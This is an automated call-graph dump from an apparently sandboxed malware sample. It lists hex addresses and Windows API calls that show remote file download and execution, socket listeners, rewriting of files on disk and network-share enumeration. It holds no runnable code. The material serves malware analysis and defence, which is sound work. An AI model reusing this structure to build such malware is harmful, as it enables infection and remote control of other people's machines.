7881->8618 7883 8f8a1f Sleep 7892 8f8a39 7883->7892 7884 8f8db5 RtlExitUserThread 7885 8f8bab Sleep 7885->7892 7887 8f8d8d Sleep 7887->7892 7888 8f8da5 Sleep 7888->7892 7889 8f8cae lstrcpy 7889->7892 7890 8f8b2a IsBadWritePtr 7890->7892 7895 8f8b48 7890->7895 7891 8fa75a 10 API calls 7891->7895 7892->7884 7892->7885 7892->7887 7892->7888 7892->7889 7892->7890 7899 8f8d47 7892->7899 8619 8fa75a GetTempPathA lstrlen 7892->8619 8629 900945 lstrcpy 7892->8629 7895->7891 8646 8f45d2 DeleteFileA CreateFileA 7895->8646 8649 8f4631 lstrcpy lstrlen 7895->8649 7898 8f8b86 Sleep 7898->7892 7899->7892 8652 9014d9 CreateFileA 7899->8652 7902 90393a 7901->7902 7903 903971 Sleep 7902->7903 7904 90397e lstrcpy LoadLibraryA 7902->7904 7903->7902 7905 9039b7 GetProcAddress 7904->7905 7906 9039cf 7904->7906 7905->7906 7907 9039d8 FreeLibrary lstrcat LoadLibraryA 7906->7907 7908 903a2c 7906->7908 7907->7908 7909 903a14 GetProcAddress 7907->7909 8697 90377a 7908->8697 7909->7908 7911 903a31 CreateThread 7912 8f41c6 3 API calls 7911->7912 8836 903062 7911->8836 7913 903a55 CreateThread 7912->7913 7914 8f41c6 3 API calls 7913->7914 8829 901e9b Sleep 7913->8829 7915 903a7c Sleep 7914->7915 7916 903ab0 7915->7916 7917 903ae7 Sleep 7916->7917 7918 903ab9 CreateThread 7916->7918 7922 903a96 Sleep 7916->7922 8708 90174a Sleep wsprintfA RegOpenKeyExA 7917->8708 7919 8f41c6 3 API calls 7918->7919 8822 901ce3 7918->8822 7919->7916 7922->7916 7923 90174a 56 API calls 7925 903b09 7923->7925 7924 903b0e Sleep 7924->7925 7925->7924 8718 90195d Sleep WNetOpenEnumA 7925->8718 7928 8f9ef9 Sleep 7927->7928 7929 8f9f06 Sleep 7927->7929 7930 8f9f11 7928->7930 7929->7930 8958 8f8f51 RegOpenKeyExA 7930->8958 7933 8f8f51 7 API calls 7934 8f9f43 LoadLibraryA 7933->7934 7935 8fa149 RtlExitUserThread 7934->7935 7936 8f9f60 GetProcAddress 7934->7936 7937 8fa165 7935->7937 7938 8f9f7e 7936->7938 7939 8f9f83 GetProcAddress 7936->7939 7940 8f9fa7 GetProcAddress 7939->7940 7941 8f9fa2 7939->7941 7942 8f9fcb GetProcAddress 7940->7942 7943 8f9fc6 7940->7943 7944 8f9fee GetProcAddress 7942->7944 7945 8f9fe9 7942->7945 7946 8fa00d 7944->7946 7947 8fa012 GetProcAddress 7944->7947 7948 8fa036 GetProcAddress 7947->7948 7949 8fa031 7947->7949 7950 8fa059 GetProcAddress 7948->7950 7951 8fa054 7948->7951 7952 8fa07d 7950->7952 7953 8fa078 7950->7953 8969 8f92f3 GetSystemDirectoryA lstrlen 7952->8969 7953->7935 7955 8fa082 CreateThread 7956 8f41c6 3 API calls 7955->7956 9003 8f940a 7955->9003 7957 8fa0a3 LoadLibraryA 7956->7957 7957->7935 7958 8fa0c0 GetProcAddress 7957->7958 7958->7935 7959 8fa0de 7958->7959 8973 8f917d CreateFileA 7959->8973 7961 8fa0e3 7962 8fa110 7961->7962 7963 8f45d2 4 API calls 7961->7963 7964 8f917d 2 API calls 7962->7964 7965 8fa0fd 7963->7965 7966 8fa118 7964->7966 8976 8f9243 7965->8976 7966->7935 8979 8f9706 GetSystemDirectoryA lstrlen 7966->8979 7970 8fa125 CreateThread 7971 8f41c6 3 API calls 7970->7971 8998 8f9ebe 7970->8998 7971->7953 7973 8fc89a 2 API calls 7972->7973 7974 902828 7973->7974 7975 902845 GlobalFree 7974->7975 7976 902885 RtlExitUserThread 7975->7976 7978 902863 7975->7978 7978->7976 9042 902514 CreateToolhelp32Snapshot 7978->9042 7980 90291f Sleep 7980->7978 7986 8f87d7 7981->7986 7982 8f88e2 RtlExitUserThread 7983 8f889a Sleep 7983->7986 7984 8f88b8 Sleep 7988 8f5760 10 API calls 7984->7988 7985 8f883d 7985->7984 7985->7986 7986->7982 7986->7983 7986->7984 7986->7985 7987 8f883f CreateThread 7986->7987 7993 8f887f Sleep 7986->7993 7989 8f41c6 3 API calls 7987->7989 9103 8f84c1 7987->9103 7990 8f88ca 7988->7990 7991 8f8868 Sleep 7989->7991 7992 8f88d2 Sleep 7990->7992 7991->7986 7992->7986 7993->7986 7995 8f83fe htons bind 7994->7995 7997 8f83f9 7994->7997 7996 8f8438 listen 7995->7996 7995->7997 7996->7997 8001 8f844d 7996->8001 7999 8f849f closesocket 7997->7999 8000 8f84a9 RtlExitUserThread 7997->8000 7998 8f8456 accept 7998->8001 7999->8000 8002 8f84bb 8000->8002 8001->7997 8001->7998 8003 8f8473 CreateThread 8001->8003 8004 8f41c6 3 API calls 8003->8004 9220 8f828e 8003->9220 8005 8f8494 8004->8005 8005->8001 8007 908060 8006->8007 8008 8f7a47 htons socket 8007->8008 8009 8f7b20 setsockopt bind 8008->8009 8010 8f7b1b 8008->8010 8009->8010 8018 8f7b69 8009->8018 8014 8f7c2a closesocket 8010->8014 8015 8f7c37 RtlExitUserThread 8010->8015 8011 8f7b76 GlobalAlloc recvfrom 8012 8f7c0f GlobalFree 8011->8012 8013 8f7be6 CreateThread 8011->8013 8012->8018 8017 8f41c6 3 API calls 8013->8017 9223 8f777d 8013->9223 8014->8015 8016 8f7c47 8015->8016 8019 8f7c0a 8017->8019 8018->8010 8018->8011 8019->8018 8020->7865 8022 8fa28f SetFileAttributesA DeleteFileA 8021->8022 8023 8fa277 8021->8023 8025 8fa28d 8022->8025 8028 8fe329 8023->8028 8025->7879 8027->7879 8029 8fe353 8028->8029 8138 8f44cb InterlockedExchange 8029->8138 8031 8fe456 8139 8f44cb InterlockedExchange 8031->8139 8033 8fe714 8034 8fe71d MultiByteToWideChar 8033->8034 8035 8fe753 RtlEnterCriticalSection 8033->8035 8036 8fe748 8034->8036 8040 8fe778 8035->8040 8036->8035 8048 8fa284 8036->8048 8037 8fe6fd 8039 8fa26e 6 API calls 8037->8039 8038 8fe499 8038->8033 8038->8037 8038->8048 8039->8048 8041 8fe7b6 GetLocalTime GetFileAttributesA SetFileAttributesA 8040->8041 8042 8fe7f2 CreateFileA 8041->8042 8052 8fe7e6 8041->8052 8043 8fe81d GetFileSize 8042->8043 8044 8fe832 8042->8044 8043->8044 8047 90088b CloseHandle SetFileAttributesA 8044->8047 8053 8fe85f GetFileTime CreateFileMappingA 8044->8053 8045 9008de GlobalFree 8046 9008ef RtlLeaveCriticalSection 8045->8046 8046->8048 8049 90090a Sleep 8046->8049 8050 9008b5 DeleteFileA 8047->8050 8051 9008af 8047->8051 8048->8022 8048->8025 8049->8048 8050->8052 8051->8050 8051->8052 8052->8045 8052->8046 8054 8fe8c2 MapViewOfFile 8053->8054 8059 8feb53 8053->8059 8054->8059 8067 8fe8e4 8054->8067 8055 9007db CloseHandle 8055->8047 8056 9007f5 SetFilePointer SetEndOfFile 8055->8056 8057 900852 8056->8057 8058 90082b 8056->8058 8061 900858 GlobalFree 8057->8061 8062 900869 SetFileTime 8057->8062 8058->8057 8060 900831 WriteFile 8058->8060 8059->8055 8063 9007d1 UnmapViewOfFile 8059->8063 8064 900793 GlobalAlloc 8059->8064 8066 9005ed 8059->8066 8060->8057 8061->8062 8062->8047 8063->8055 8064->8066 8065 90077f 8065->8063 8066->8065 8067->8059 8071 8fe9ba 8067->8071 8286 8f44cb InterlockedExchange 8067->8286 8069 8fe997 8069->8071 8287 8f44cb InterlockedExchange 8069->8287 8071->8059 8072 8fed26 lstrcpyn lstrcmpiA 8071->8072 8074 8fed5c 8072->8074 8073 8fee9a GlobalAlloc 8075 8feecc 8073->8075 8074->8059 8074->8073 8076 8feecf 8074->8076 8075->8076 8140 8f44cb InterlockedExchange 8076->8140 8078 8ff319 8079 8ff925 8078->8079 8288 8fcd03 8078->8288 8081 8ff9a1 8079->8081 8084 8fcd03 2 API calls 8079->8084 8083 8ff9f8 8081->8083 8085 8fcd03 2 API calls 8081->8085 8082 8ff306 IsBadWritePtr 8082->8078 8092 8fef48 8082->8092 8141 8f44cb InterlockedExchange 8083->8141 8084->8081 8085->8083 8087 8ffa0e 8088 8ffa55 8087->8088 8340 8f44cb InterlockedExchange 8087->8340 8142 8f44cb InterlockedExchange 8088->8142 8091 8ffa82 8093 8fcd03 2 API calls 8091->8093 8094 8ffad5 8091->8094 8092->8059 8092->8078 8092->8082 8097 8ff39d 8092->8097 8093->8094 8095 8fcd03 2 API calls 8094->8095 8096 8ffb50 8094->8096 8095->8096 8102 8ffb9e 8096->8102 8341 8fc76b 8096->8341 8099 8ff4ce IsBadWritePtr 8097->8099 8104 8ff4e1 8099->8104 8100 8ffc7e 8143 8f44cb InterlockedExchange 8100->8143 8102->8100 8103 8fcd03 2 API calls 8102->8103 8103->8100 8107 8ff579 IsBadWritePtr 8104->8107 8105 8ffc94 8106 8ffd1f 8105->8106 8108 8ffd5c 8105->8108 8112 8fcd03 2 API calls 8105->8112 8355 8fb3ef 8106->8355 8115 8ff58c 8107->8115 8108->8059 8144 8fd34d 8108->8144 8110 8ff5e4 IsBadWritePtr 8110->8078 8113 8ff5fc IsBadWritePtr 8110->8113 8112->8106 8113->8078 8126 8ff614 8113->8126 8115->8110 8116 8ff634 IsBadWritePtr 8116->8078 8118 8ff64c IsBadWritePtr 8116->8118 8117 8fc89a 2 API calls 8128 8ffe88 8117->8128 8118->8078 8118->8126 8119 8ff705 IsBadWritePtr 8119->8078 8119->8126 8120 8ff742 IsBadWritePtr 8120->8078 8120->8126 8121 8ff76e lstrcmpiA 8122 8ff7cd lstrcmpiA 8121->8122 8121->8126 8123 8ff802 lstrcmpiA 8122->8123 8122->8126 8124 8ff834 lstrcmpiA 8123->8124 8123->8126 8125 8ff875 lstrcmpiA 8124->8125 8124->8126 8125->8126 8126->8078 8126->8116 8126->8119 8126->8120 8126->8121 8126->8122 8126->8123 8126->8124 8126->8125 8128->8059 8381 8f6981 8128->8381 8129 9003c7 8130 9004a3 8129->8130 8392 8f44cb InterlockedExchange 8130->8392 8132 9004ed GetTickCount 8133 9005c8 8132->8133 8134 90051a 8132->8134 8133->8059 8393 8f44cb InterlockedExchange 8134->8393 8136 90051f 8136->8133 8394 8f44cb InterlockedExchange 8136->8394 8138->8031 8139->8038 8140->8092 8141->8087 8142->8091 8143->8105 8145 8fd3b6 8144->8145 8149 8fd3e7 8145->8149 8428 8f44cb InterlockedExchange 8145->8428 8147 8fd45c 8395 8f44cb InterlockedExchange 8147->8395 8149->8147 8151 8fcd03 2 API calls 8149->8151 8150 8fd47b 8152 8fd4aa 8150->8152 8429 8f44cb InterlockedExchange 8150->8429 8151->8149 8154 8fc76b 2 API calls 8152->8154 8155 8fd4e3 8154->8155 8156 8fc76b 2 API calls 8155->8156 8157 8fd50b 8156->8157 8396 8f44cb InterlockedExchange 8157->8396 8159 8fd535 8160 8fd564 8159->8160 8430 8f44cb InterlockedExchange 8159->8430 8162 8fc76b 2 API calls 8160->8162 8163 8fd58b 8162->8163 8164 8fc76b 2 API calls 8163->8164 8165 8fd5c8 8164->8165 8166 8fb3ef InterlockedExchange 8165->8166 8167 8fd603 8166->8167 8397 8f44cb InterlockedExchange 8167->8397 8169 8fd613 8398 8fb354 8169->8398 8173 8fd659 8174 8fd688 8173->8174 8431 8f44cb InterlockedExchange 8173->8431 8176 8fc76b 2 API calls 8174->8176 8177 8fd6b9 8176->8177 8408 8f44cb InterlockedExchange 8177->8408 8179 8fd6cf 8180 8fd706 8179->8180 8432 8f44cb InterlockedExchange 8179->8432 8182 8fc76b 2 API calls 8180->8182 8183 8fd749 8182->8183 8184 8fb3ef InterlockedExchange 8183->8184 8185 8fd7b6 8184->8185 8409 8fd1b9 8185->8409 8187 8fd7dc 8188 8fb3ef InterlockedExchange 8187->8188 8189 8fd7fc 8188->8189 8190 8fc76b 2 API calls 8189->8190 8191 8fd824 8190->8191 8192 8fb3ef InterlockedExchange 8191->8192 8193 8fd87f 8192->8193 8422 8f44cb InterlockedExchange 8193->8422 8195 8fd8a9 8197 8fd8e8 8195->8197 8433 8f44cb InterlockedExchange 8195->8433 8198 8fc76b 2 API calls 8197->8198 8199 8fd925 8198->8199 8423 8f44cb InterlockedExchange 8199->8423 8202 8fd935 8203 8fd974 8202->8203 8434 8f44cb InterlockedExchange 8202->8434 8204 8fc76b 2 API calls 8203->8204 8205 8fd9b7 8204->8205 8206 8fb3ef InterlockedExchange 8205->8206 8207 8fd9d7 8206->8207 8208 8fb3ef InterlockedExchange 8207->8208 8209 8fda11 8208->8209 8210 8fd1b9 2 API calls 8209->8210 8211 8fda37 8210->8211 8212 8fb3ef InterlockedExchange 8211->8212 8213 8fda57 8212->8213 8214 8fd1b9 2 API calls 8213->8214 8215 8fda7d 8214->8215 8216 8fb3ef InterlockedExchange 8215->8216 8217 8fdac3 8216->8217 8218 8fc76b 2 API calls 8217->8218 8219 8fdaeb 8218->8219 8424 8f44cb InterlockedExchange 8219->8424 8221 8fdafb 8223 8fdb3a 8221->8223 8435 8f44cb InterlockedExchange 8221->8435 8224 8fc76b 2 API calls 8223->8224 8225 8fdb92 8224->8225 8226 8fc76b 2 API calls 8225->8226 8227 8fdc05 8226->8227 8228 8fc76b 2 API calls 8227->8228 8229 8fdc2d 8228->8229 8425 8f44cb InterlockedExchange 8229->8425 8231 8fdc3d 8233 8fdc7c 8231->8233 8436 8f44cb InterlockedExchange 8231->8436 8234 8fc76b 2 API calls 8233->8234 8235 8fdcc9 8234->8235 8236 8fb3ef InterlockedExchange 8235->8236 8237 8fdd36 8236->8237 8238 8fd1b9 2 API calls 8237->8238 8239 8fdd5c 8238->8239 8240 8fb3ef InterlockedExchange 8239->8240 8241 8fdd7c 8240->8241 8242 8fb3ef InterlockedExchange 8241->8242 8243 8fddd2 8242->8243 8244 8fb3ef InterlockedExchange 8243->8244 8245 8fde2d 8244->8245 8246 8fc76b 2 API calls 8245->8246 8247 8fde8b 8246->8247 8248 8fc76b 2 API calls 8247->8248 8249 8fdeb3 8248->8249 8426 8f44cb InterlockedExchange 8249->8426 8251 8fdec3 8253 8fdf0a 8251->8253 8437 8f44cb InterlockedExchange 8251->8437 8254 8fc76b 2 API calls 8253->8254 8255 8fdf61 8254->8255 8256 8fb3ef InterlockedExchange 8255->8256 8257 8fdf81 8256->8257 8258 8fb3ef InterlockedExchange 8257->8258 8259 8fdfee 8258->8259 8260 8fd1b9 2 API calls 8259->8260 8261 8fe014 8260->8261 8262 8fb3ef InterlockedExchange 8261->8262 8263 8fe034 8262->8263 8264 8fc76b 2 API calls 8263->8264 8265 8fe05a 8264->8265 8266 8fc76b 2 API calls 8265->8266 8267 8fe082 8266->8267 8427 8f44cb InterlockedExchange 8267->8427 8270 8fe0cd 8271 8fe114 8270->8271 8438 8f44cb InterlockedExchange 8270->8438 8272 8fc76b 2 API calls 8271->8272 8273 8fe16b 8272->8273 8274 8fc76b 2 API calls 8273->8274 8275 8fe193 8274->8275 8276 8fc76b 2 API calls 8275->8276 8277 8fe1bb 8276->8277 8278 8fc76b 2 API calls 8277->8278 8279 8fe1e1 8278->8279 8280 8fc76b 2 API calls 8279->8280 8281 8fe20a 8280->8281 8282 8fc76b 2 API calls 8281->8282 8283 8fe28f 8282->8283 8284 8fc76b 2 API calls 8283->8284 8285 8fe2c4 8284->8285 8285->8059 8285->8117 8286->8069 8287->8071 8289 8fcd47 8288->8289 8290 8fcd58 8288->8290 8444 8fcb12 8289->8444 8456 8f44cb InterlockedExchange 8290->8456 8293 8fcd68 8294 8fce2c 8293->8294 8457 8fcc78 8293->8457 8296 8fce62 8294->8296 8299 8fcb12 InterlockedExchange 8294->8299 8467 8f44cb InterlockedExchange 8296->8467 8299->8296 8301 8fcdac 8303 8fcdd9 8301->8303 8304 8fcdc2 8301->8304 8302 8fd1a7 8302->8079 8465 8f44cb InterlockedExchange 8303->8465 8464 8f44cb InterlockedExchange 8304->8464 8305 8fce72 8309 8fcc78 InterlockedExchange 8305->8309 8339 8fd060 8305->8339 8306 8fcb12 InterlockedExchange 8306->8302 8311 8fcea5 8309->8311 8310 8fcdc7 8466 8f44cb InterlockedExchange 8310->8466 8311->8339 8468 8f44cb InterlockedExchange 8311->8468 8314 8fce09 8316 8fc76b 2 API calls 8314->8316 8315 8fceca 8469 8f44cb InterlockedExchange 8315->8469 8316->8294 8318 8fceea 8319 8fcf2b 8318->8319 8320 8fcf04 8318->8320 8322 8fc76b 2 API calls 8319->8322 8321 8fb354 2 API calls 8320->8321 8323 8fcf1a 8321->8323 8322->8323 8470 8f44cb InterlockedExchange 8323->8470 8325 8fcf66 8326 8fc76b 2 API calls 8325->8326 8327 8fcf78 8325->8327 8326->8327 8328 8fcfff 8327->8328 8329 8fcfe8 8327->8329 8472 8f44cb InterlockedExchange 8328->8472 8471 8f44cb InterlockedExchange 8329->8471 8332 8fcfed 8333 8fc76b 2 API calls 8332->8333 8334 8fd037 8333->8334 8335 8fd0f1 8334->8335 8336 8fd050 8334->8336 8335->8339 8474 8f44cb InterlockedExchange 8335->8474 8336->8339 8473 8f44cb InterlockedExchange 8336->8473 8339->8302 8339->8306 8340->8087 8342 8fb3ef InterlockedExchange 8341->8342 8343 8fc78a 8342->8343 8344 8fc7cb 8343->8344 8345 8fc79b 8343->8345 8346 8fc7fe 8344->8346 8347 8fc7d1 8344->8347 8486 8fb614 8345->8486 8350 8fc82f 8346->8350 8351 8fc804 8346->8351 8536 8fbfb2 8347->8536 8352 8fc7bb 8350->8352 8576 8fc61c 8350->8576 8565 8fc459 8351->8565 8352->8102 8356 8fb41e 8355->8356 8357 8fb425 8355->8357 8356->8108 8600 8f44cb InterlockedExchange 8357->8600 8359 8fb431 8362 8fb45e 8359->8362 8601 8f44cb InterlockedExchange 8359->8601 8609 8f44cb InterlockedExchange 8362->8609 8363 8fb44c 8363->8362 8602 8f44cb InterlockedExchange 8363->8602 8364 8fb574 8364->8356 8365 8fb59e 8364->8365 8610 8f44cb InterlockedExchange 8364->8610 8611 8f44cb InterlockedExchange 8365->8611 8368 8fb47a 8379 8fb4f4 8368->8379 8603 8f44cb InterlockedExchange 8368->8603 8372 8fb495 8604 8f44cb InterlockedExchange 8372->8604 8374 8fb4aa 8605 8f44cb InterlockedExchange 8374->8605 8376 8fb4bf 8377 8fb4ee 8376->8377 8606 8f44cb InterlockedExchange 8376->8606 8377->8379 8607 8f44cb InterlockedExchange 8377->8607 8608 8f44cb InterlockedExchange 8379->8608 8612 8f44cb InterlockedExchange 8381->8612 8383 8f6990 8384 8f6cdf 8383->8384 8385 8f6d75 8383->8385 8391 8f69e9 8383->8391 8386 8f6cec 8384->8386 8387 8f6d3b 8384->8387 8385->8391 8613 8f60d9 8385->8613 8388 8f4503 InterlockedExchange 8386->8388 8390 8f4503 InterlockedExchange 8387->8390 8388->8391 8390->8391 8391->8129 8392->8132 8393->8136 8394->8136 8395->8150 8396->8159 8397->8169 8399 8fb366 8398->8399 8440 8f44cb InterlockedExchange 8398->8440 8439 8f44cb InterlockedExchange 8399->8439 8402 8fb37b 8403 8fb38d GetTickCount 8402->8403 8404 8fb39c 8402->8404 8403->8404 8405 8fc76b InterlockedExchange 8404->8405 8406 8fb3b7 8405->8406 8407 8f44cb InterlockedExchange 8406->8407 8407->8173 8408->8179 8410 8fd1f4 8409->8410 8411 8fd346 8410->8411 8412 8fd20e 8410->8412 8441 8f44cb InterlockedExchange 8410->8441 8411->8187 8442 8f44cb InterlockedExchange 8412->8442 8415 8fd273 8417 8fc76b 2 API calls 8415->8417 8418 8fd298 8415->8418 8416 8fd232 8416->8415 8443 8f44cb InterlockedExchange 8416->8443 8417->8418 8420 8fb3ef InterlockedExchange 8418->8420 8421 8fd336 8420->8421 8421->8187 8422->8195 8423->8202 8424->8221 8425->8231 8426->8251 8427->8270 8428->8145 8429->8150 8430->8159 8431->8173 8432->8179 8433->8195 8434->8202 8435->8221 8436->8231 8437->8251 8438->8270 8439->8402 8440->8399 8441->8412 8442->8416 8443->8415 8445 8fb3ef InterlockedExchange 8444->8445 8446 8fcb4b 8445->8446 8475 8f44cb InterlockedExchange 8446->8475 8448 8fcb5f 8449 8fcc4b 8448->8449 8476 8f44cb InterlockedExchange 8448->8476 8451 8fb3ef InterlockedExchange 8449->8451 8452 8fcc62 8451->8452 8452->8290 8453 8f44cb InterlockedExchange 8455 8fcb7a 8453->8455 8455->8449 8455->8453 8477 8f4503 8455->8477 8456->8293 8458 8fcc92 8457->8458 8461 8fccf8 8457->8461 8458->8461 8484 8f44cb InterlockedExchange 8458->8484 8460 8fccc0 8460->8461 8485 8f44cb InterlockedExchange 8460->8485 8461->8294 8463 8f44cb InterlockedExchange 8461->8463 8463->8301 8464->8310 8465->8310 8466->8314 8467->8305 8468->8315 8469->8318 8470->8325 8471->8332 8472->8332 8473->8339 8474->8339 8475->8448 8476->8455 8482 8f44cb InterlockedExchange 8477->8482 8479 8f450c 8483 8f44cb InterlockedExchange 8479->8483 8481 8f451a 8481->8455 8482->8479 8483->8481 8484->8460 8485->8460 8487 8fb64a 8486->8487 8488 8fb3ef InterlockedExchange 8487->8488 8489 8fb67b 8488->8489 8581 8f44cb InterlockedExchange 8489->8581 8491 8fb68b 8523 8f4503 InterlockedExchange 8491->8523 8524 8fb75e 8491->8524 8535 8f44cb InterlockedExchange 8491->8535 8493 8fb3ef InterlockedExchange 8494 8fba31 8493->8494 8495 8fba46 8494->8495 8498 8fbe04 8494->8498 8585 8f44cb InterlockedExchange 8495->8585 8497 8fba4b 8500 8fbb06 8497->8500 8501 8fba75 8497->8501 8502 8fbd22 8497->8502 8514 8fbcb3 8497->8514 8531 8fbadc 8497->8531 8498->8531 8591 8f44cb InterlockedExchange 8498->8591 8499 8fb913 8533 8fba0a 8499->8533 8583 8f44cb InterlockedExchange 8499->8583 8506 8fb354 2 API calls 8500->8506 8517 8fb3ef InterlockedExchange 8501->8517 8504 8fbd5f 8502->8504 8505 8fbd28 8502->8505 8509 8fbd7f 8504->8509 8510 8fbd68 8504->8510 8508 8fbfb2 2 API calls 8505->8508 8511 8fbb1a 8506->8511 8507 8fbf63 8507->8352 8508->8531 8590 8f44cb InterlockedExchange 8509->8590 8589 8f44cb InterlockedExchange 8510->8589 8518 8fb3ef InterlockedExchange 8511->8518 8512 8fb3ef InterlockedExchange 8512->8507 8514->8531 8588 8f44cb InterlockedExchange 8514->8588 8517->8531 8522 8fbb3a 8518->8522 8519 8fb995 8528 8fb9d5 8519->8528 8584 8f44cb InterlockedExchange 8519->8584 8521 8fbd6d 8534 8fb3ef InterlockedExchange 8521->8534 8525 8fbb4b 8522->8525 8526 8fbb85 8522->8526 8523->8491 8582 8f44cb InterlockedExchange 8524->8582 8586 8f44cb InterlockedExchange 8525->8586 8587 8f44cb InterlockedExchange 8526->8587 8532 8fb614 2 API calls 8528->8532 8531->8507 8531->8512 8532->8533 8533->8493 8534->8531 8535->8491 8537 8fb3ef InterlockedExchange 8536->8537 8538 8fbffe 8537->8538 8592 8f44cb InterlockedExchange 8538->8592 8540 8fc00e 8563 8fc10f 8540->8563 8593 8f44cb InterlockedExchange 8540->8593 8541 8fb3ef InterlockedExchange 8542 8fc136 8541->8542 8564 8fc1b8 8542->8564 8595 8f44cb InterlockedExchange 8542->8595 8544 8fc18a 8546 8fc2a3 8544->8546 8547 8fc1f2 8544->8547 8544->8564 8549 8fb354 2 API calls 8546->8549 8555 8fb3ef InterlockedExchange 8547->8555 8548 8fc40e 8548->8352 8551 8fc2b7 8549->8551 8550 8fb3ef InterlockedExchange 8550->8548 8552 8fb3ef InterlockedExchange 8551->8552 8556 8fc2d7 8552->8556 8553 8fc092 8557 8fc0da 8553->8557 8594 8f44cb InterlockedExchange 8553->8594 8555->8564 8558 8fc2e8 8556->8558 8559 8fc322 8556->8559 8560 8fbfb2 2 API calls 8557->8560 8596 8f44cb InterlockedExchange 8558->8596 8597 8f44cb InterlockedExchange 8559->8597 8560->8563 8563->8541 8564->8548 8564->8550 8566 8fb3ef InterlockedExchange 8565->8566 8567 8fc490 8566->8567 8570 8fc4bc 8567->8570 8598 8f44cb InterlockedExchange 8567->8598 8569 8fc4aa 8569->8570 8571 8fb354 2 API calls 8569->8571 8573 8fc60a 8570->8573 8575 8fb3ef InterlockedExchange 8570->8575 8572 8fc4f6 8571->8572 8599 8f44cb InterlockedExchange 8572->8599 8573->8352 8575->8573 8577 8fb3ef InterlockedExchange 8576->8577 8578 8fc653 8577->8578 8579 8fb3ef InterlockedExchange 8578->8579 8580 8fc759 8578->8580 8579->8580 8580->8352 8581->8491 8582->8499 8583->8519 8584->8519 8585->8497 8586->8531 8587->8531 8588->8531 8589->8521 8590->8521 8591->8531 8592->8540 8593->8553 8594->8553 8595->8544 8596->8564 8597->8564 8598->8569 8599->8570 8600->8359 8601->8363 8602->8368 8603->8372 8604->8374 8605->8376 8606->8376 8607->8379 8608->8362 8609->8364 8610->8365 8611->8356 8612->8383 8614 8f6132 8613->8614 8616 8f61f2 8614->8616 8617 8f44cb InterlockedExchange 8614->8617 8616->8391 8617->8616 8618->7883 8620 8fa7a9 lstrcat 8619->8620 8621 8fa7b8 8619->8621 8620->8621 8671 8fa16b 8621->8671 8623 8fa7c4 lstrcpy 8676 8f44cb InterlockedExchange 8623->8676 8625 8fa7da 8626 8fa7ec lstrlen wsprintfA 8625->8626 8627 8fa814 lstrlen wsprintfA 8625->8627 8628 8fa83b 8626->8628 8627->8628 8628->7892 8679 8fa677 8629->8679 8631 900b8f 8631->7892 8633 900a0a InternetOpenA 8634 900a31 InternetOpenUrlA 8633->8634 8635 900b63 8633->8635 8634->8635 8636 900a63 8634->8636 8637 900b79 8635->8637 8638 900b6c InternetCloseHandle 8635->8638 8639 900a69 CreateFileA 8636->8639 8640 900a8b InternetReadFile 8636->8640 8637->8631 8641 900b82 InternetCloseHandle 8637->8641 8638->8637 8639->8640 8645 900ab3 8640->8645 8641->8631 8642 900b56 CloseHandle 8642->8635 8643 900acf WriteFile 8643->8645 8644 900b15 8644->8642 8645->8640 8645->8642 8645->8643 8645->8644 8647 8f462d 8646->8647 8648 8f460b WriteFile CloseHandle 8646->8648 8647->7895 8648->8647 8650 8f470c CreateProcessA 8649->8650 8650->7898 8653 901536 GlobalAlloc ReadFile lstrlen 8652->8653 8657 90152f 8652->8657 8654 901587 8653->8654 8655 901730 8654->8655 8656 90159d lstrlen 8654->8656 8655->8657 8658 901736 GlobalFree 8655->8658 8666 9015c4 8656->8666 8657->7899 8658->8657 8659 901641 SetFilePointer WriteFile SetFilePointer SetEndOfFile CloseHandle 8661 9016c4 8659->8661 8662 9016b8 8659->8662 8660 9015fe lstrlen 8660->8666 8664 9016d4 DeleteFileA 8661->8664 8665 9016ca GlobalFree 8661->8665 8662->8661 8663 9016e5 8662->8663 8667 8f4631 3 API calls 8663->8667 8664->8657 8665->8664 8666->8655 8666->8659 8666->8660 8668 9016ee Sleep CreateThread 8667->8668 8669 8f41c6 3 API calls 8668->8669 8691 8fa1f2 lstrcpy 8668->8691 8670 901722 Sleep 8669->8670 8670->8655 8677 8f44cb InterlockedExchange 8671->8677 8673 8fa1dd lstrcpy 8673->8623 8675 8fa192 8675->8673 8678 8f44cb InterlockedExchange 8675->8678 8676->8625 8677->8675 8678->8675 8681 8fa68a 8679->8681 8680 8fa757 8680->8631 8680->8633 8681->8680 8682 8fa6b0 8681->8682 8683 8fa70f GetTickCount 8682->8683 8684 8fa6c5 GetTickCount 8682->8684 8690 8f44cb InterlockedExchange 8683->8690 8689 8f44cb InterlockedExchange 8684->8689 8687 8fa6d2 GetTickCount lstrlen wsprintfA 8687->8680 8688 8fa71c GetTickCount lstrlen wsprintfA 8688->8680 8689->8687 8690->8688 8692 8fa226 8691->8692 8693 8fa22f GetFileAttributesA 8692->8693 8694 8fa25d RtlExitUserThread 8692->8694 8695 8fa243 DeleteFileA Sleep 8693->8695 8696 8fa241 8693->8696 8695->8692 8696->8694 8698 908060 8697->8698 8699 903787 GlobalAlloc 8698->8699 8700 90381f 8699->8700 8747 902fff 8700->8747 8702 8fe329 48 API calls 8703 90382e 8702->8703 8703->8702 8704 90384d Sleep 8703->8704 8706 90385a 8703->8706 8704->8703 8707 9038a2 8706->8707 8752 8f44cb InterlockedExchange 8706->8752 8707->7911 8709 90192e 8708->8709 8712 901828 8708->8712 8709->7923 8710 901843 RegEnumValueA 8711 90191a RegCloseKey 8710->8711 8710->8712 8711->8709 8712->8710 8714 9018bd lstrlen lstrlen 8712->8714 8715 9018f4 8714->8715 8716 8fe329 48 API calls 8715->8716 8717 90190a Sleep 8716->8717 8717->8712 8719 901a42 GlobalAlloc 8718->8719 8720 901a26 8718->8720 8723 901a5a 8719->8723 8720->7925 8721 901c9d GlobalFree WNetCloseEnum 8721->8720 8722 901a79 WNetEnumResourceA 8722->8723 8724 901c7e GetLastError 8722->8724 8723->8721 8723->8722 8726 901c8d Sleep 8723->8726 8727 901acf 8723->8727 8725 901c8b 8724->8725 8724->8726 8725->8721 8726->8723 8728 901c77 8727->8728 8729 901c51 8727->8729 8730 901b14 lstrcpy lstrcat 8727->8730 8728->7925 8732 90195d 103 API calls 8729->8732 8731 900b9a 7 API calls 8730->8731 8733 901b47 8731->8733 8734 901c69 Sleep 8732->8734 8733->8729 8735 901bf1 8733->8735 8736 901b6b lstrcpy lstrlen 8733->8736 8734->8728 8741 901c0f lstrlen 8735->8741 8745 901c38 8735->8745 8737 901b96 lstrcat 8736->8737 8738 901ba8 lstrlen 8736->8738 8737->8738 8740 8fa16b 2 API calls 8738->8740 8739 901c44 DeleteFileA 8739->8729 8742 901bc2 lstrcat 8740->8742 8759 901060 Sleep 